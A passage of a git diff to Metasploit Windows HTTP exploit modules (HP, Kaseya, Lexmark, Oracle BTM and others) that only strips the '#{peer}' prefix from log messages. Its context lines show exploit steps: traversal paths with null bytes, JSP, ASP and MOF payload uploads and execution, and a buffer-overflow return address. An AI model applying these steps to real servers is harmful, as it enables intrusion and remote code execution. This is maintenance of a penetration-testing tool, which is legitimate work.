b/modules/exploits/windows/http/efs_fmws_userid_bof.rb @@ -78,10 +78,10 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_raw({'uri' => '/whatsnew.txt'}) if res && res.body =~ /What's new in Easy File Management Web Server V(\d\.\d)/ version = $1 - vprint_status "#{peer} - Found version: #{version}" + vprint_status "Found version: #{version}" elsif res.headers['server'] =~ /Easy File Management Web Server v(4\.0)/ version = $1 - vprint_status "#{peer} - Based on Server header: #{version}" + vprint_status "Based on Server header: #{version}" end version @@ -107,7 +107,7 @@ class Metasploit3 < Msf::Exploit::Remote # Get target version to determine how to reach call/jmp esp # - print_status("#{peer} - Fingerprinting version...") + print_status("Fingerprinting version...") version = get_version if target.name =~ /Automatic/ @@ -118,11 +118,11 @@ class Metasploit3 < Msf::Exploit::Remote elsif version =~ /4\.0/ my_target = targets[2] end - print_good("#{peer} - Version #{version} found") + print_good("Version #{version} found") else my_target = target unless version && my_target.name.include?(version) - print_error("#{peer} - The selected target doesn't match the detected version, trying anyway...") + print_error("The selected target doesn't match the detected version, trying anyway...") end end @@ -142,7 +142,7 @@ class Metasploit3 < Msf::Exploit::Remote sploit << [0x1002466D].pack("V") # Push eax > retn sploit << payload.encoded - print_status "#{peer} - Trying target #{my_target.name}..." + print_status "Trying target #{my_target.name}..." # # NOTE: Successful HTTP request is required to trigger diff --git a/modules/exploits/windows/http/ericom_access_now_bof.rb b/modules/exploits/windows/http/ericom_access_now_bof.rb index a69621f8e8..a770467975 100644 --- a/modules/exploits/windows/http/ericom_access_now_bof.rb +++ b/modules/exploits/windows/http/ericom_access_now_bof.rb @@ -90,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Sending malformed request...") + print_status("Sending malformed request...") send_request_raw({ 'method' => 'GET', 'uri' => exploit_uri, diff --git a/modules/exploits/windows/http/generic_http_dll_injection.rb b/modules/exploits/windows/http/generic_http_dll_injection.rb index 04c5ae4b94..949c22a1e0 100644 --- a/modules/exploits/windows/http/generic_http_dll_injection.rb +++ b/modules/exploits/windows/http/generic_http_dll_injection.rb @@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote sploit = target_uri.to_s sploit << unc - print_status("#{peer} - Trying to ") + print_status("Trying to ") send_request_raw({ 'method' => 'GET', 'uri' => sploit diff --git a/modules/exploits/windows/http/hp_autopass_license_traversal.rb b/modules/exploits/windows/http/hp_autopass_license_traversal.rb index ab30446ec0..82245bab7a 100644 --- a/modules/exploits/windows/http/hp_autopass_license_traversal.rb +++ b/modules/exploits/windows/http/hp_autopass_license_traversal.rb @@ -125,7 +125,7 @@ class Metasploit3 < Msf::Exploit::Remote dropper = jsp_drop_bin(war, war_traversal) dropper_filename = rand_text_alpha(8) + ".jsp" - print_status("#{peer} - Uploading the JSP dropper #{dropper_filename}...") + print_status("Uploading the JSP dropper #{dropper_filename}...") # The JSP, by default, is uploaded to: # C:\Program Files\HP\HP AutoPass License Server\AutoPass\LicenseServer\conf\pdfiles\ # In order to execute it, through the AutoPass application we would like to drop it here: @@ -143,7 +143,7 @@ class Metasploit3 < Msf::Exploit::Remote res.body.to_s.include?("java.lang.NullPointerException") && res.body.to_s.include?("com.hp.autopass") - print_error("#{peer} - Unexpected response... upload maybe failed, trying anyway...") + print_error("Unexpected response... upload maybe failed, trying anyway...") end res = send_request_cgi({ @@ -152,14 +152,14 @@ class Metasploit3 < Msf::Exploit::Remote }) unless res and res.code == 200 - print_error("#{peer} - Unexpected response after executing the dropper...") + print_error("Unexpected response after executing the dropper...") end 10.times do select(nil, nil, nil, 2) # Now make a request to trigger the newly deployed war - print_status("#{peer} - Attempting to launch payload in deployed WAR...") + print_status("Attempting to launch payload in deployed WAR...") res = send_request_cgi( { 'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8) + ".jsp"), diff --git a/modules/exploits/windows/http/hp_imc_bims_upload.rb b/modules/exploits/windows/http/hp_imc_bims_upload.rb index 8a17371a60..eb447a6e35 100644 --- a/modules/exploits/windows/http/hp_imc_bims_upload.rb +++ b/modules/exploits/windows/http/hp_imc_bims_upload.rb @@ -84,7 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote #jsp = payload.encoded.gsub(/\x0d\x0a/, "").gsub(/\x0a/, "") jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp" - print_status("#{peer} - Uploading the JSP payload...") + print_status("Uploading the JSP payload...") res = send_request_cgi({ 'uri' => normalize_uri("/", "upload", "upload"), 'method' => 'PUT', @@ -93,13 +93,13 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body.empty? - print_status("#{peer} - JSP payload uploaded successfully") + print_status("JSP payload uploaded successfully") register_files_for_cleanup("..\\web\\apps\\upload\\#{jsp_name}") else fail_with(Failure::Unknown, "#{peer} - JSP payload upload failed") end - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") send_request_cgi({ 'uri' => normalize_uri("/", "upload", jsp_name), 'method' => 'GET' diff --git a/modules/exploits/windows/http/hp_imc_mibfileupload.rb b/modules/exploits/windows/http/hp_imc_mibfileupload.rb index e468efc285..f3366ccfbd 100644 --- a/modules/exploits/windows/http/hp_imc_mibfileupload.rb +++ b/modules/exploits/windows/http/hp_imc_mibfileupload.rb @@ -86,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote data = post_data.to_s - print_status("#{peer} - Uploading the JSP payload...") + print_status("Uploading the JSP payload...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path.to_s, "webdm", "mibbrowser", "mibFileUpload"), 'method' => 'POST', @@ -96,13 +96,13 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body.empty? - print_status("#{peer} - JSP payload uploaded successfully") + print_status("JSP payload uploaded successfully") register_files_for_cleanup(jsp_name) else fail_with(Failure::Unknown, "#{peer} - JSP payload upload failed") end - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") send_request_cgi({ 'uri' => normalize_uri(jsp_name), 'method' => 'GET' diff --git a/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb b/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb index c9fdac58ba..a41ebf45b8 100644 --- a/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb +++ b/modules/exploits/windows/http/hp_loadrunner_copyfiletoserver.rb @@ -109,11 +109,11 @@ class Metasploit3 < Msf::Exploit::Remote depth = datastore['DEPTH'] install_path = datastore['INSTALLPATH'] - vprint_status("#{peer} - Detecting tomcat version...") + vprint_status("Detecting tomcat version...") tomcat_version = get_tomcat_version if tomcat_version - print_status("#{peer} - Tomcat #{tomcat_version} detected... Verifying traversal...") + print_status("Tomcat #{tomcat_version} detected... Verifying traversal...") location = "" location << install_path location << "\\" unless install_path.ends_with("\\") or install_path.ends_with("/") @@ -122,19 +122,19 @@ class Metasploit3 < Msf::Exploit::Remote res = read_file(depth, location, "index.jsp") if res and res.code == 200 and res.body.to_s =~ /HP Service Emulation/ - vprint_good("#{peer} - Traversal exists and parameters are correct...") + vprint_good("Traversal exists and parameters are correct...") return Exploit::CheckCode::Vulnerable elsif res and res.code == 500 and res.body.to_s =~ /FileNotFoundException/ - vprint_warning("#{peer} - Traversal appears to exist, try adjusting parameters DEPTH and INSTALLPATH...") + vprint_warning("Traversal appears to exist, try adjusting parameters DEPTH and INSTALLPATH...") return Exploit::CheckCode::Appears else - vprint_status("#{peer} - Failed to verify the directory traversal...") + vprint_status("Failed to verify the directory traversal...") end else - vprint_error("#{peer} - Tomcat version not detected...") + vprint_error("Tomcat version not detected...") end - vprint_status("#{peer} - Checking if the vulnerable web service and method exist...") + vprint_status("Checking if the vulnerable web service and method exist...") res = send_request_cgi({ 'uri' => normalize_uri('ServiceEmulation', 'services', 'EmulationAdmin'), 'vars_get' => { 'wsdl' => 1 } @@ -151,16 +151,16 @@ class Metasploit3 < Msf::Exploit::Remote depth = datastore['DEPTH'] install_path = datastore['INSTALLPATH'] - print_status("#{peer} - Retrieving the Tomcat version used...") + print_status("Retrieving the Tomcat version used...") tomcat_version = get_tomcat_version if tomcat_version.nil? fail_with(Failure::NoTarget, "#{peer} - Failed to retrieve the Tomcat version used") else - print_good("#{peer} - Tomcat #{tomcat_version} found") + print_good("Tomcat #{tomcat_version} found") end - print_status("#{peer} - Verifying parameters to exploit the directory traversal...") + print_status("Verifying parameters to exploit the directory traversal...") brute_force = false location = "" location << install_path @@ -170,37 +170,37 @@ class Metasploit3 < Msf::Exploit::Remote res = read_file(depth, location, "index.jsp") if res and res.code == 200 and res.body.to_s =~ /HP Service Emulation/ - print_good("#{peer} - Traversal parameters are correct") + print_good("Traversal parameters are correct") elsif res and res.code == 500 and res.body.to_s =~ /FileNotFoundException/ - print_error("#{peer} - Traversal parameters are incorrect, will try to brute force depth...") + print_error("Traversal parameters are incorrect, will try to brute force depth...") brute_force = true else fail_with(Failure::Unknown, "#{peer} - Unknown error while verifying the traversal parameters") end if brute_force - print_status("#{peer} - Trying to brute force the traversal depth...") + print_status("Trying to brute force the traversal depth...") depth = brute_force_depth(location) if depth.nil? fail_with(Failure::BadConfig, "#{peer} - Traversal parameters are incorrect, try setting DEPTH and INSTALLPATH") end - print_good("#{peer} - Using #{depth} as depth length to exploit the traversal...") + print_good("Using #{depth} as depth length to exploit the traversal...") end jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp" # It's uploading a JSP payload because AutoDeploy on the webapps directory isn't working on my tests - print_status("#{peer} - Uploading the JSP payload...") + print_status("Uploading the JSP payload...") res = upload_file(depth, location, jsp_name, payload.encoded) if res and res.code == 200 and res.body.to_s =~ /copyFileToServerResponse/ and res.body.to_s !~ /faultcode/ - print_status("#{peer} - JSP payload uploaded successfully") + print_status("JSP payload uploaded successfully") register_files_for_cleanup("..\\..\\#{location}\\#{jsp_name}") else fail_with(Failure::Unknown, "#{peer} - JSP payload upload failed") end - print_status("#{peer} - Executing payload on #{normalize_uri('ServiceEmulation', 'services', 'EmulationAdmin', jsp_name)}...") + print_status("Executing payload on #{normalize_uri('ServiceEmulation', 'services', 'EmulationAdmin', jsp_name)}...") send_request_cgi({ 'uri' => normalize_uri('ServiceEmulation', jsp_name), diff --git a/modules/exploits/windows/http/hp_mpa_job_acct.rb b/modules/exploits/windows/http/hp_mpa_job_acct.rb index 4c5df23135..65ba7b2ac3 100644 --- a/modules/exploits/windows/http/hp_mpa_job_acct.rb +++ b/modules/exploits/windows/http/hp_mpa_job_acct.rb @@ -219,16 +219,16 @@ class Metasploit3 < Msf::Exploit::Remote locations.each {|location| asp_location = location + asp_name - print_status("#{peer} - Uploading #{asp.length} bytes to #{location}...") + print_status("Uploading #{asp.length} bytes to #{location}...") res = upload(asp, asp_location) if res and res.code == 200 and res.body =~ /Results of Upload/ and res.body !~ /Object\[formFile\]/ - print_good("#{peer} - ASP Payload successfully wrote to #{location}") + print_good("ASP Payload successfully wrote to #{location}") payload_url = asp_location break elsif res and res.code == 200 and res.body =~ /Results of Upload/ and res.body =~ /Object\[formFile\]/ - print_error("#{peer} - Error probably due to permissions while writing to #{location}") + print_error("Error probably due to permissions while writing to #{location}") else - print_error("#{peer} - Unknown error while while writing to #{location}") + print_error("Unknown error while while writing to #{location}") end } @@ -239,7 +239,7 @@ class Metasploit3 < Msf::Exploit::Remote # # EXECUTE # - print_status("#{peer} - Executing payload through #{payload_url}...") + print_status("Executing payload through #{payload_url}...") send_request_cgi({ 'uri' => payload_url}) end diff --git a/modules/exploits/windows/http/hp_pcm_snac_update_certificates.rb b/modules/exploits/windows/http/hp_pcm_snac_update_certificates.rb index e82552a092..ed9ddab692 100644 --- a/modules/exploits/windows/http/hp_pcm_snac_update_certificates.rb +++ b/modules/exploits/windows/http/hp_pcm_snac_update_certificates.rb @@ -115,19 +115,19 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Getting a valid session...") + print_status("Getting a valid session...") session = get_session if session.nil? fail_with(Failure::NoTarget, "#{peer} - Failed to get a valid session") end - print_status("#{peer} - Uploading payload...") + print_status("Uploading payload...") jsp = exploit_upload(session) unless jsp fail_with(Failure::NotVulnerable, "#{peer} - Upload failed") end - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") send_request_cgi({ 'uri' => "/RegWeb/#{jsp}" }) end diff --git a/modules/exploits/windows/http/hp_pcm_snac_update_domain.rb b/modules/exploits/windows/http/hp_pcm_snac_update_domain.rb index 11ae035e25..40eb5cab67 100644 --- a/modules/exploits/windows/http/hp_pcm_snac_update_domain.rb +++ b/modules/exploits/windows/http/hp_pcm_snac_update_domain.rb @@ -113,19 +113,19 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Getting a valid session...") + print_status("Getting a valid session...") session = get_session if session.nil? fail_with(Failure::NoTarget, "#{peer} - Failed to get a valid session") end - print_status("#{peer} - Uploading payload...") + print_status("Uploading payload...") jsp = exploit_upload(session) unless jsp fail_with(Failure::NotVulnerable, "#{peer} - Upload failed") end - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") send_request_cgi({ 'uri' => "/RegWeb/#{jsp}" }) end diff --git a/modules/exploits/windows/http/hp_sitescope_dns_tool.rb b/modules/exploits/windows/http/hp_sitescope_dns_tool.rb index b5f8e8b7af..a221aebd55 100644 --- a/modules/exploits/windows/http/hp_sitescope_dns_tool.rb +++ b/modules/exploits/windows/http/hp_sitescope_dns_tool.rb @@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote session = get_authenticated_session_id(initial_session, redirect) csrf_token = get_csrf_token(session) - print_status("#{peer} - Executing payload") + print_status("Executing payload") random_mark = Rex::Text.rand_text_alpha(5 + rand(5)) res = send_request_cgi( { @@ -101,7 +101,7 @@ class Metasploit3 < Msf::Exploit::Remote end def get_initial_session_id - print_status("#{peer} - Retrieving an initial JSESSIONID...") + print_status("Retrieving an initial JSESSIONID...") res = send_request_cgi( 'uri' => normalize_uri(target_uri.path.to_s, 'servlet', 'Main'), 'method' => 'POST' @@ -117,7 +117,7 @@ class Metasploit3 < Msf::Exploit::Remote end def authenticate(session_id) - print_status("#{peer} - Authenticating on HP SiteScope Configuration...") + print_status("Authenticating on HP SiteScope Configuration...") res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path.to_s, 'j_security_check'), @@ -139,7 +139,7 @@ class Metasploit3 < Msf::Exploit::Remote end def get_authenticated_session_id(session_id, redirect) - print_status("#{peer} - Following redirection to finish authentication...") + print_status("Following redirection to finish authentication...") res = send_request_cgi( { @@ -158,7 +158,7 @@ class Metasploit3 < Msf::Exploit::Remote end def get_csrf_token(session) - print_status("#{peer} - Getting anti-CSRF token...") + print_status("Getting anti-CSRF token...") res = send_request_cgi( 'uri' => normalize_uri(target_uri.path.to_s, 'jsp', 'tabs.jsp'), 'cookie' => session diff --git a/modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb b/modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb index 61734310a5..9310991d96 100644 --- a/modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb +++ b/modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb @@ -83,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Delivering payload...") + print_status("Delivering payload...") # The path to the injection is something like: # * Java exec => cscript => WScript.Shell => cmd.exe (injection happens) diff --git a/modules/exploits/windows/http/jira_collector_traversal.rb b/modules/exploits/windows/http/jira_collector_traversal.rb index de50318045..1fcd7c1d38 100644 --- a/modules/exploits/windows/http/jira_collector_traversal.rb +++ b/modules/exploits/windows/http/jira_collector_traversal.rb @@ -110,20 +110,20 @@ class Metasploit3 < Msf::Exploit::Remote register_files_for_cleanup("..\\..\\#{datastore['JIRA_PATH']}\\#{@exe_filename}") return true else - print_error("#{peer} - Upload failed...") + print_error("Upload failed...") return false end end def upload_and_run_jsp(filename, contents) - print_status("#{peer} - Getting a valid CSRF token...") + print_status("Getting a valid CSRF token...") csrf_token = get_upload_token fail_with(Failure::Unknown, "#{peer} - Unable to find the CSRF token") if csrf_token.empty? - print_status("#{peer} - Exploiting traversal to upload JSP dropper...") + print_status("Exploiting traversal to upload JSP dropper...") upload_file(filename, contents, csrf_token) - print_status("#{peer} - Executing the dropper...") + print_status("Executing the dropper...") send_request_cgi( { 'uri' => normalize_uri(target_uri.path, filename), @@ -150,15 +150,15 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Generating EXE...") + print_status("Generating EXE...") exe = payload.encoded_exe @exe_filename = Rex::Text.rand_text_alpha(8) + ".exe" - print_status("#{peer} - Generating JSP dropper...") + print_status("Generating JSP dropper...") dropper = jsp_drop_and_execute(exe, @exe_filename) dropper_filename = Rex::Text.rand_text_alpha(8) + ".jsp" - print_status("#{peer} - Uploading and running JSP dropper...") + print_status("Uploading and running JSP dropper...") upload_and_run_jsp(dropper_filename, dropper) end diff --git a/modules/exploits/windows/http/kaseya_uploader.rb b/modules/exploits/windows/http/kaseya_uploader.rb index 00748d0456..a481ff4676 100644 --- a/modules/exploits/windows/http/kaseya_uploader.rb +++ b/modules/exploits/windows/http/kaseya_uploader.rb @@ -60,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote def upload_file(payload, path, filename, session_id) - print_status("#{peer} - Uploading payload to #{path}...") + print_status("Uploading payload to #{path}...") res = send_request_cgi({ 'method' => 'POST', @@ -114,7 +114,7 @@ class Metasploit3 < Msf::Exploit::Remote paths.each do |path| if upload_file(payload, path, asp_name, session_id) register_files_for_cleanup(path + asp_name) - print_status("#{peer} - Executing payload #{asp_name}") + print_status("Executing payload #{asp_name}") send_request_cgi({ 'uri' => normalize_uri(asp_name), diff --git a/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb b/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb index 2839baa385..ab0204bfc9 100644 --- a/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb +++ b/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb @@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Getting cookie...") + print_status("Getting cookie...") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri("SystemTab", "uploadImage.asp") @@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote post_data.add_part(asp, "application/octet-stream", nil, "form-data; name=\"uploadFile\"; filename=\"#{@payload_name}") data = post_data.to_s - print_status("#{peer} - Uploading payload...") + print_status("Uploading payload...") res = send_request_cgi({ "method" => "POST", "uri" => normalize_uri("SystemTab", "uploadImage.asp"), @@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote register_files_for_cleanup(@payload_name) - print_status("#{peer} - Executing payload #{@payload_name}") + print_status("Executing payload #{@payload_name}") res = send_request_cgi({ 'uri' => normalize_uri(@payload_name), 'method' => 'GET' diff --git a/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb b/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb index abe6834898..bac17e0e49 100644 --- a/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb +++ b/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb @@ -91,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote # UPLOAD # attack_url = uri_path + "landesk/managementsuite/core/core.anonymous/ServerSetup.asmx" - print_status("#{peer} - Uploading #{asp.length} bytes through #{attack_url}...") + print_status("Uploading #{asp.length} bytes through #{attack_url}...") res = send_request_cgi({ 'uri' => attack_url, @@ -104,9 +104,9 @@ class Metasploit3 < Msf::Exploit::Remote }, 20) if (! res) - print_status("#{peer} - Timeout: Trying to execute the payload anyway") + print_status("Timeout: Trying to execute the payload anyway") elsif (res.code < 200 or res.code >= 300) - print_error("#{peer} - Upload failed on #{attack_url} [#{res.code} #{res.message}]") + print_error("Upload failed on #{attack_url} [#{res.code} #{res.message}]") return end @@ -114,7 +114,7 @@ class Metasploit3 < Msf::Exploit::Remote # EXECUTE # upload_path = uri_path + "ldlogon/#{upload_random}.asp" - print_status("#{peer} - Executing #{upload_path}...") + print_status("Executing #{upload_path}...") res = send_request_cgi({ 'uri' => upload_path, @@ -122,12 +122,12 @@ class Metasploit3 < Msf::Exploit::Remote }, 20) if (! res) - print_error("#{peer} - Execution failed on #{upload_path} [No Response]") + print_error("Execution failed on #{upload_path} [No Response]") return end if (res.code < 200 or res.code >= 300) - print_error("#{peer} - Execution failed on #{upload_path} [#{res.code} #{res.message}]") + print_error("Execution failed on #{upload_path} [#{res.code} #{res.message}]") return end @@ -149,7 +149,7 @@ class Metasploit3 < Msf::Exploit::Remote eos attack_url = uri_path + "WSVulnerabilityCore/VulCore.asmx" - print_status("#{peer} - Deleting #{upload_path} through #{attack_url}...") + print_status("Deleting #{upload_path} through #{attack_url}...") res = send_request_cgi({ 'uri' => attack_url, @@ -162,10 +162,10 @@ class Metasploit3 < Msf::Exploit::Remote }, 20) if (! res) - print_error("#{peer} - Deletion failed at #{attack_url} [No Response]") + print_error("Deletion failed at #{attack_url} [No Response]") return elsif (res.code < 200 or res.code >= 300) - print_error("#{peer} - Deletion failed at #{attack_url} [#{res.code} #{res.message}]") + print_error("Deletion failed at #{attack_url} [#{res.code} #{res.message}]") return end diff --git a/modules/exploits/windows/http/lexmark_markvision_gfd_upload.rb b/modules/exploits/windows/http/lexmark_markvision_gfd_upload.rb index 44441df158..39c4b04f60 100644 --- a/modules/exploits/windows/http/lexmark_markvision_gfd_upload.rb +++ b/modules/exploits/windows/http/lexmark_markvision_gfd_upload.rb @@ -75,9 +75,9 @@ class Metasploit3 < Msf::Exploit::Remote # Default app folder on C:\Program Files\Lexmark\Markvision Enterprise\tomcat\webappps\ROOT traversal_leak = "/..\\..\\..\\tomcat\\webapps\\ROOT\\#{jsp_name_leak}\x00.pdf" - print_status("#{peer} - Uploading info leak JSP #{jsp_name_leak}...") + print_status("Uploading info leak JSP #{jsp_name_leak}...") if upload_file(traversal_leak, jsp_leak) - print_good("#{peer} - JSP successfully uploaded") + print_good("JSP successfully uploaded") else fail_with(Failure::Unknown, "#{peer} - JSP upload failed") end @@ -86,25 +86,25 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.body.to_s !~ /null/ && res.body.to_s =~ /Path:(.*)/ upload_path = $1 - print_good("#{peer} - Working directory found in #{upload_path}") + print_good("Working directory found in #{upload_path}") register_file_for_cleanup(::File.join(upload_path, 'webapps', 'ROOT', jsp_name_leak)) else - print_error("#{peer} - Couldn't retrieve the upload directory, manual cleanup will be required") + print_error("Couldn't retrieve the upload directory, manual cleanup will be required") end jsp_payload_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp" jsp_payload = payload.encoded traversal_payload = "/..\\..\\..\\tomcat\\webapps\\ROOT\\#{jsp_payload_name}\x00.pdf" - print_status("#{peer} - Uploading JSP payload #{jsp_payload_name}...") + print_status("Uploading JSP payload #{jsp_payload_name}...") if upload_file(traversal_payload, jsp_payload) - print_good("#{peer} - JSP successfully uploaded") + print_good("JSP successfully uploaded") register_file_for_cleanup(::File.join(upload_path, 'webapps', 'ROOT', jsp_payload_name)) if upload_path else fail_with(Failure::Unknown, "#{peer} - JSP upload failed") end - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") execute(jsp_payload_name, 3) end diff --git a/modules/exploits/windows/http/manage_engine_opmanager_rce.rb b/modules/exploits/windows/http/manage_engine_opmanager_rce.rb index 14391ebab3..18ae25b9b5 100644 --- a/modules/exploits/windows/http/manage_engine_opmanager_rce.rb +++ b/modules/exploits/windows/http/manage_engine_opmanager_rce.rb @@ -53,7 +53,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # Check version - vprint_status("#{peer} - Trying to detect ManageEngine OpManager") + vprint_status("Trying to detect ManageEngine OpManager") res = send_request_cgi({ 'method' => 'GET', @@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Access login page") + print_status("Access login page") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'jsp', 'Login.do'), @@ -109,14 +109,14 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 302 redirect = URI(res.headers['Location']).to_s.gsub(/#\//, "") - print_status("#{peer} - Location is [ #{redirect} ]") + print_status("Location is [ #{redirect} ]") else fail_with(Failure::Unknown, "#{peer} - Access to login page failed!") end # Follow redirection process - print_status("#{peer} - Following redirection") + print_status("Following redirection") res = send_request_cgi({ 'uri' => redirect, 'method' => 'GET' @@ -124,7 +124,7 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.body =~ /window.OPM.apiKey = "([a-z0-9]+)"/ api_key = $1 - print_status("#{peer} - Retrieved API key [ #{api_key} ]") + print_status("Retrieved API key [ #{api_key} ]") else fail_with(Failure::Unknown, "#{peer} - Redirect failed!") end @@ -133,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Remote war_payload = payload.encoded_war({ :app_name => app_base }).to_s war_payload_base64 = Rex::Text.encode_base64(war_payload).gsub(/\n/, '') - print_status("#{peer} - Executing SQL queries") + print_status("Executing SQL queries") # Remove large object in database, just in case it exists from previous exploit attempts sql = 'SELECT lo_unlink(-1)' @@ -167,7 +167,7 @@ class Metasploit3 < Msf::Exploit::Remote select(nil, nil, nil, 2) # Now make a request to trigger the newly deployed war - print_status("#{peer} - Attempting to launch payload in deployed WAR...") + print_status("Attempting to launch payload in deployed WAR...") res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, app_base, "#{Rex::Text.rand_text_alpha(rand(8) + 8)}.jsp"), diff --git a/modules/exploits/windows/http/miniweb_upload_wbem.rb b/modules/exploits/windows/http/miniweb_upload_wbem.rb index 23aa9083fa..9fe3d101c1 100644 --- a/modules/exploits/windows/http/miniweb_upload_wbem.rb +++ b/modules/exploits/windows/http/miniweb_upload_wbem.rb @@ -86,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote def upload(filename, filedata) - print_status("#{peer} - Trying to upload '#{::File.basename(filename)}'") + print_status("Trying to upload '#{::File.basename(filename)}'") uri = normalize_uri(target_uri.path.to_s, "#{rand_text_alpha(rand(10)+5)}") depth = "../" * (datastore['DEPTH'] + rand(10)) @@ -118,13 +118,13 @@ class Metasploit3 < Msf::Exploit::Remote # upload exe exe_name = "WINDOWS/system32/#{fname}.exe" exe = generate_payload_exe - print_status("#{peer} - Sending executable (#{exe.length.to_s} bytes)") + print_status("Sending executable (#{exe.length.to_s} bytes)") upload(exe_name, exe) # upload mof mof_name = "WINDOWS/system32/wbem/mof/#{fname}.mof" mof = generate_mof(::File.basename(mof_name), ::File.basename(exe_name)) - print_status("#{peer} - Sending MOF (#{mof.length.to_s} bytes)") + print_status("Sending MOF (#{mof.length.to_s} bytes)") upload(mof_name, mof) # list files to clean up diff --git a/modules/exploits/windows/http/novell_mdm_lfi.rb b/modules/exploits/windows/http/novell_mdm_lfi.rb index af793df59f..b70727e917 100644 --- a/modules/exploits/windows/http/novell_mdm_lfi.rb +++ b/modules/exploits/windows/http/novell_mdm_lfi.rb @@ -68,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote def check v = get_version - print_status("#{peer} - Detected version: #{v || 'Unknown'}") + print_status("Detected version: #{v || 'Unknown'}") if v.nil? return Exploit::CheckCode::Unknown @@ -133,19 +133,19 @@ class Metasploit3 < Msf::Exploit::Remote def exploit() begin - print_status("#{peer} - Checking application version...") + print_status("Checking application version...") v = get_version if v.nil? - print_error("#{peer} - Unable to detect version, abort!") + print_error("Unable to detect version, abort!") return end - print_good("#{peer} - Found Version #{v}") - print_status("#{peer} - Setting up poisoned session") + print_good("Found Version #{v}") + print_status("Setting up poisoned session") session_id,cmd = setup_session() - print_status("#{peer} - Uploading payload") + print_status("Uploading payload") fname = upload_shell(session_id,cmd) - print_status("#{peer} - Executing payload") + print_status("Executing payload") exec_shell(session_id,cmd,fname) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout diff --git a/modules/exploits/windows/http/oracle_btm_writetofile.rb b/modules/exploits/windows/http/oracle_btm_writetofile.rb index c9abd7bfad..7980ec25ae 100644 --- a/modules/exploits/windows/http/oracle_btm_writetofile.rb +++ b/modules/exploits/windows/http/oracle_btm_writetofile.rb @@ -135,7 +135,7 @@ class Metasploit3 < Msf::Exploit::Remote end traversal << "WINDOWS\\system32\\#{@var_vbs_name}.vbs" - print_status("#{peer} - Uploading the VBS payload") + print_status("Uploading the VBS payload") soap_request = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" " soap_request << "xmlns:int=\"http://schemas.amberpoint.com/flashtunnel/interfaces\" " @@ -163,9 +163,9 @@ class Metasploit3 < Msf::Exploit::Remote }, 5) if res and res.code == 200 and res.body =~ /writeToFileResponse/ - print_status("#{peer} - VBS payload successfully uploaded") + print_status("VBS payload successfully uploaded") else - print_error("#{peer} - Failed to upload the VBS payload") + print_error("Failed to upload the VBS payload") return end @@ -191,7 +191,7 @@ class Metasploit3 < Msf::Exploit::Remote soap_request << " </soapenv:Body>" soap_request << "</soapenv:Envelope>" - print_status("#{peer} - Uploading the MOF file") + print_status("Uploading the MOF file") res = send_request_cgi( { @@ -204,9 +204,9 @@ class Metasploit3 < Msf::Exploit::Remote }, 5) if res and res.code == 200 and res.body =~ /writeToFileResponse/ - print_status("#{peer} - MOF file successfully uploaded") + print_status("MOF file successfully uploaded") else - print_error("#{peer} - Failed to upload the MOF file") + print_error("Failed to upload the MOF file") return end @@ -221,7 +221,7 @@ class Metasploit3 < Msf::Exploit::Remote end traversal << "\\server\\examples\\build\\mainWebApp\\#{@jsp_name}.jsp" 